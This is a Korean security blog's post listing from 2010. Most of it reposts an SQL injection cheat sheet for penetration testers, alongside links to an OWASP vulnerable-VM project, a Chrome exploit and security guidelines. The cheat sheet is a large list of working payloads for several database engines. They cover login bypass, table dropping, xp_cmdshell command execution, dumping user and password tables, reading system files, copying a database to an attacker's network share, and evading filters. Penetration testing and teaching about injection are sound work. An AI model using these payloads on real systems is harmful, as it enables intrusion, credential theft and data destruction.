'분류 전체보기'에 해당되는 글 239건

2010.02.03 OWASP Broken Web Applications Project
2010.01.21 악성코드 분석 사이트(BitBlaze Malware Analysis Service)
2010.01.11 ‘2010 정책 캘린더’
2010.01.06 2007 전자정부 웹취약점 대응지침
2010.01.06 Google Chrome MetaCharacter URI Obfuscation Vulnerability
2009.12.23 공공기관 - 개인정보 처리단계별 기술적 보호조치 가이드라인
2009.12.23 웹 보안 툴박스(http://toolbox.krcert.or.kr/)
2009.12.20 웹사이트 개발운영을 위한 개인정보보호가이드
2009.12.17 SQL Injection Cheat Sheet
2009.12.16 oracle sql injection 2

OWASP Broken Web Applications Project

Purpose: a collection of vulnerable web applications that is distributed on a Virtual Machine.

링크 : http://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project#tab=Project_Details

관련 이미지 다운로드 : http://code.google.com/p/owaspbwa/wiki/Downloads

id : root
pw : owaspbwa

Installation

The VM requires no installation. Simply extract the files from the archive and then start the VM in a VMware product. Once the machine is booted, you can access it via the console, SSH, or Samba using username=root and password=owaspbwa.

Note - The VM is entirely command line driven. X-Windows or other GUI systems have not been installed.

If you would like to access your VM from links off this site, the one configuration change you may need to make is to add an entry to your hosts file pointing to the name owaspbwa to the IP address of your VM.

저작자표시

Posted by 김주일

악성코드 분석 사이트(BitBlaze Malware Analysis Service)

링크 : https://aerie.cs.berkeley.edu/index-d.php

분석 결과

파일을 업로드 하면 입력한 이메일 주소로 분석 결과를 알려 줌.

저작자표시

Posted by 김주일

2007 전자정부 웹취약점 대응지침

46 2007 전자정부 웹 서비스 취약점 대응지침 .hwp

51p. 참조

저작자표시

Posted by 김주일

Google Chrome MetaCharacter URI Obfuscation Vulnerability

링크
- http://ww.milw0rm.com/exploits/7226
- http://zeroknock.blogspot.com/2010/01/link-injection-redirection-attacks.html

동영상
- http://www.secniche.org/videos/google_chrome_link_inj.html

동영상 배경음악이 인상적이였음

저작자표시

Posted by 김주일

공공기관 - 개인정보 처리단계별 기술적 보호조치 가이드라인

8.hwp

저작자표시

Posted by 김주일

웹 보안 툴박스(http://toolbox.krcert.or.kr/)

KISA에서 제공하는 웹보안을 위한 서비스들이 모여 있네.

링크 : http://toolbox.krcert.or.kr/

저작자표시

Posted by 김주일

웹사이트 개발운영을 위한 개인정보보호가이드

웹사이트개발운영을위한개인정보보호가이.pdf

괜히 했어. 삽질 괜히 했어.

출 처 : http://www.securenet.or.kr/index.jsp

저작자표시

Posted by 김주일

SQL Injection Cheat Sheet

ChangeLog

Date	Change
09/07/07	DB2 Database SQL Injection Cheatsheet(Author: pentestmonkey.net)
09/07/07	Ingres Database SQL Injection Cheatsheet (Author: pentestmonkey.net)
13/03/07	Bypass SQL Injection Filters
03/01/06	Added some more blind SQL injection tests for MySQL (Author: jungsonn)
21/12/06	Added Concat tests for blind SQL Injection tests.
06/Nov/06	Added PostgreSQL payloads
06/Nov/06	Added Data to Oracle
06/Nov/06	Added Sybase section
Oct/06	Wrote initial paper.

Introduction

Comments:
This paper was primarily written to aid penetration testers. I hope you find it useful. Please email me additional payloads as you find them.

» Generic – Bypass Authentication

The following payloads are generally applied to login forms with a username and password. Correctly performing these attacks will allow you to authenticate to the web application (unless otherwise stated).

Payload	Description (if any)
realusername' OR 1=1–	Authenticate as a real user without requiring a password.
'OR '' = '	Allows authentication without a valid username.
admin'–	Authenticate as user admin without a password.
' union select 1, 'user', 'pass' 1–	Requires knowledge of column names.
'; drop table users–	DANGEROUS! this will delete the user database if the table name is 'users'.

» Microsoft SQL

Payload	Description (if any)
'admin –sp_password	sp_traceXXX audit evasion. The sp_password prevents storing clear text passwords in the log files. Appending this after your comments (–) can prevent SQL Injection queries being logged.
select @@version	View database version.
select @@servername	Misc. information disclosure
select @@microsoftversion	Misc. information disclosure
select * from master..sysservers	Misc. information disclosure
select * from sysusers	View database usernames and passwords.
exec master..xp_cmdshell 'ipconfig+/all'	Misc. command execution with cp_cmdshell.
exec master..xp_cmdshell 'net+view'	Misc. command execution with cp_cmdshell.
exec master..xp_cmdshell 'net+users'	Misc. command execution with cp_cmdshell.
exec master..xp_cmdshell 'ping+system-controlled-by-attacker'	Misc. command execution with cp_cmdshell – this is useful for blind SQL Injection tests (where no results are displayed).
BACKUP database master to disks='\\{IP}\{sharename}\backupdb.dat'	Backup entire database to a file. This attack can be used to steal a database.
create table myfile (line varchar(8000))" bulk insert foo from ‘c:\inetpub\wwwroot\auth.asp’" select * from myfile"–	Reading files on the filesystem.
xp_servicecontrol (START or STOP) <service>	Start and stop Windows Services.
str1 + str2 OR n+n	Concat strings for blind SQL Injection tests.

» Sybase

Payload	Description (if any)
select @@version"–	View database version.
select name from master..syslogins"–	Misc. information disclosure
select name from master..sysdatabases"–	Misc. information disclosure
convert(integer,(select+min(name)+from+syslogins+where+name>'))–	Integer conversion “error” trick.
convert(integer,(select+min(name)+from+syslogins+where+name>'sybase'))–	An error will occur presenting the first value of the rowset (lets say its sybase). We then continue as before by placing the value into our query. An error will then present the next value in the rowset. We continue as before.
xp_cmdshell 'ipconfig+/all'	Misc. command execution with cp_cmdshell.
xp_cmdshell 'net+view'	Misc. command execution with cp_cmdshell.
xp_cmdshell 'net+users'	Misc. command execution with cp_cmdshell.
xp_cmdshell 'ping+system-controlled-by-attacker'	Misc. command execution with cp_cmdshell – this is useful for blind SQL Injection tests (where no results are displayed).
waitfor delay '0:0:5'	Misc. command execution with cp_cmdshell – this is useful for blind SQL Injection tests (where no results are displayed).
create proxy_table myfile external file at "c:\temp\file_to_read.txt" select * from myfile"	Reading files on the filesystem.
create table myfile (record varchar(2000)) external file at "c:\temp\myfile.exe" insert into myfile values(0xAND_YOUR_BINARY_DATA)"	Write file to filesystem.
str1 + str2 or n+n	Concat strings for blind SQL Injection tests.

» MySQL

Payload	Description (if any)
select @@version;	View database version.
select host,user,db from mysql.db;	Misc. information disclosure
select host,user,password from mysql.user;	View MySQL usernames and passwords.
create table myfile (input TEXT); load data infile ‘/etc/passwd’ into table myfile; OR load data infile ‘/home/{user}/.rhosts’ into table myfile; select * from myfile;	Reading files on the filesystem.
select host,user,password from user into outfile ‘/tmp/passwd’;	Write files on the filesystem. This attack is limited by the fact that you can only write to either “/tmp” or “/var/tmp”.
select CONCAT(”a”,”b”);	Concat strings for blind SQL Injection tests.
BENCHMARK(1000000000,MD5(’gainingtime’))	Cause delay for blind SQL Injection tests.
BENCHMARK(1000000000,MD5(CHAR(116)))	Cause delay for blind SQL Injection tests. Same as before, but this can be used if quotes are filtered.
IF EXISTS (SELECT * FROM users WHERE username = ‘root’) BENCHMARK(1000000000,MD5(’gainingtime’))	Check if username exists, if yes there will be an delay.
IF EXISTS (SELECT * FROM users WHERE username = ‘root’) WAITFOR DELAY ‘0:0:3′	Check if username exists, if yes there will be an delay for 3 seconds.

» Oracle

Robert Hurlbut has put together an awesome document on Oracle SQL Injection. He seems to have far more experience in this area then I, so i will merely present a link to his blog entry on this topic (http://weblogs.asp.net/rhurlbut/archive/2004/01/24/62560.aspx).

Payload	Description (if any)
str1 \|\| str2 OR CONCAT (str1, str2)	Concat strings for blind SQL Injection tests.

» PostgreSQL

Payload	Description (if any)
select version();	View database version.
select current_database();	Misc. information disclosure
select current_user;	Misc. information disclosure
select session_user;	Misc. information disclosure
select current_setting(’log_connections’);	Misc. information disclosure
select current_setting(’log_statement’);	Misc. information disclosure
select current_setting(’port’);	Misc. information disclosure
select current_setting(’password_encryption’);	Misc. information disclosure
select current_setting(’krb_server_keyfile’);	Misc. information disclosure
select current_setting(’virtual_host’);	Misc. information disclosure
select current_setting(’port’);	Misc. information disclosure
select current_setting(’config_file’);	Misc. information disclosure
select current_setting(’hba_file’);	Misc. information disclosure
select current_setting(’data_directory’);	Misc. information disclosure
select * from pg_shadow;	View database usernames and passwords.
select * from pg_group;	View database usernames and passwords.
create table myfile (input TEXT); copy myfile from ‘/etc/passwd’; select * from myfile;	Read files on the filesystem.
copy myfile to ‘/tmp/test’;	Write files to filesystem.
str1 \|\| str2	Concat strings for blind SQL Injection tests.

» DB2

Payload	Description (if any)
Comments	select blah from foo; — comment like this
Batching Queries Allowed?	???
Database Version	select versionnumber, version_timestamp from sysibm.sysversions;
Current Database User	select user from sysibm.sysdummy1; select session_user from sysibm.sysdummy1;
System User for Current Connection	select system_user from sysibm.sysdummy1;
Current Database	select current server from sysibm.sysdummy1;
Limiting Rows Returned	SELECT foo FROM bar fetch first 1 rows only;
Returning N Rows starting at Offset M	select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
List Tables	select name from sysibm.systables;
List Columns	select name, tbname, coltype from sysibm.syscolumns;
List Databse Users and Passwords	Database authorities (like roles, I think) can be listed like this: select grantee from syscat.dbauth;
FROM clause mandated in SELECTs?	Yes, use sysibm.sysdummy1: select 123 from sysibm.sysdummy1;
UNION supported	Yes select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;
Enumerate Tables Privs	select * from syscat.tabauth;
Enumerate Current Privs	select * from syscat.dbauth where grantee = current user; select * from syscat.tabauth where grantee = current user;
Length of a string	select name, tbname, coltype from sysibm.syscolumns; — returns 3
Bitwise AND	This page seems to indicate that DB2 has no support for bitwise operators!
Substring	SELECT SUBSTR(’abc’,2,1) FROM sysibm.sysdummy1; — returns b
ASCII value of a character	select ascii(’A') from sysibm.sysdummy1; — returns 65
Character from ASCII value	select chr(65) from sysibm.sysdummy1; — returns ‘A’
Roles and passwords	N/A (I think DB2 uses OS-level user accounts for authentication.)
List Database Procedures	???
Create Users + Granting Privs	???
Time Delays	???
Execute OS Commands	???
Write to File System	???
Concatenation	SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1; — returns ‘abc’ select ‘a’ \|\| ‘b’ from sysibm.sysdummy1; — returns ‘ab’
Casting	SELECT cast(’123′ as integer) FROM sysibm.sysdummy1; SELECT cast(1 as char) FROM sysibm.sysdummy1;
List schemas	SELECT schemaname FROM syscat.schemata;

» Ingres

Payload	Description (if any)
Comments	Normal “–” and C-style /*/ comments are allowed: select 123; — sdfjsdlkfj select 123; / sdfsdf */
Batching Queries Allowed?	Not via DBI in PERL. Subsequent statements seem to get ignored: select blah from table where foo = 1; select … doesn’t matter this is ignored.
Database Version	select dbmsinfo(’_version’);
Current Database User	select dbmsinfo(’session_user’);
System User for Current Connection	select dbmsinfo(’system_user’);
Current Database	select dbmsinfo(’database’);
Limiting Rows Returned	select top 10 blah from table; select first 10 blah form table;
Returning N Rows starting at Offset M	Astoundingly, this doesn’t seem to be possible!
List Tables	select table_name, table_owner from iitables; select relid, relowner, relloc from iirelation; select relid, relowner, relloc from iirelation where relowner != ‘$ingres’;
List Columns	select column_name, column_datatype, table_name, table_owner from iicolumns;
List Databse Users and Passwords	First connect to iidbdb, then: select name, password from iiuser;
FROM clause mandated in SELECTs?	No. You don’t need to select form “dual” or anything. The following is legal: select 1;
UNION supported	Yes. Nothing tricky here. The following is legal: select 1 union select 2;
Enumerate Tables Privs	select table_name, permit_user, permit_type from iiaccess;
Enumerate Current Privs	select dbmsinfo(’db_admin’); select dbmsinfo(’create_table’); select dbmsinfo(’create_procedure’); select dbmsinfo(’security_priv’); select dbmsinfo(’select_syscat’); select dbmsinfo(’db_privileges’); select dbmsinfo(’current_priv_mask’);
Length of a string	select length(’abc’); — returns 3
Bitwise AND	The function “bit_and” exists, but seems hard to use. Here’s an example of ANDing 3 and 5 together. The result is a “byte” type with value \001: select substr(bit_and(cast(3 as byte), cast(5 as byte)),1,1);
Substring	select substr(’abc’, 2, 1); — returns ‘b’
ASCII value of a character	??? (The “ascii” function exists, but doesn’t seem to do what I’d expect.)
Roles and passwords	First you need to connect to iidbdb, then: select roleid, rolepass from iirole;
List Database Procedures	First you need to connect to iidbdb, then: select dbp_name, dbp_owner from iiprocedure;
Create Users + Granting Privs	First you need to connect to iidbdb, then: create user pm with password = ‘password’; grant all on current installation to pm;
Time Delays	???
Execute OS Commands	???
Write to File System	???
Concatenation	select ‘abc’ \|\| ‘def’;
Casting	select cast(123 as varchar); select cast(’123′ as integer);

» Bypass SQL Injection Filters

Payload	Description (if any)
select password from tablename where username = concat(char(39),char(97),char(100),char(109),char(105),char(110),char( 39)) into outfile concat(char(39),char(97),char(100),char(109),char(105),char(110),char( 39))	Writing info into files without single quotes (example). You must specify a new file (it may not exist) and give the correct pathname.
select * from login where user = char(39,97,39)	Using char() to bypass restrictions.

출 처 : http://michaeldaw.org/sql-injection-cheat-sheet

저작자표시

Posted by 김주일

oracle sql injection

아~ 그대의 속살을 만져보고 싶구나.
오라클..

sql injection 관련해서 공격과 그에 대한 대응방법을 교육시켜주는 사이트.

잘 몰라서 어렵게 느껴지는거겠찌.

링크 : http://st-curriculum.oracle.com/tutorial/SQLInjection/index.htm

저작자표시

Posted by 김주일

일	월	화	수	목	금	토
1	2	3	4	5	6	7
8	9	10	11	12	13	14
15	16	17	18	19	20	21
22	23	24	25	26	27	28
29	30	31

콩나물

'분류 전체보기'에 해당되는 글 239건

OWASP Broken Web Applications Project

Installation

악성코드 분석 사이트(BitBlaze Malware Analysis Service)

‘2010 정책 캘린더’

2007 전자정부 웹취약점 대응지침

Google Chrome MetaCharacter URI Obfuscation Vulnerability

공공기관 - 개인정보 처리단계별 기술적 보호조치 가이드라인

웹 보안 툴박스(http://toolbox.krcert.or.kr/)

웹사이트 개발운영을 위한 개인정보보호가이드

SQL Injection Cheat Sheet

Table of Contents

ChangeLog

Introduction

oracle sql injection

카테고리

공지사항

태그목록

최근에 올라온 글

최근에 달린 댓글

최근에 받은 트랙백

글 보관함

달력

링크

티스토리툴바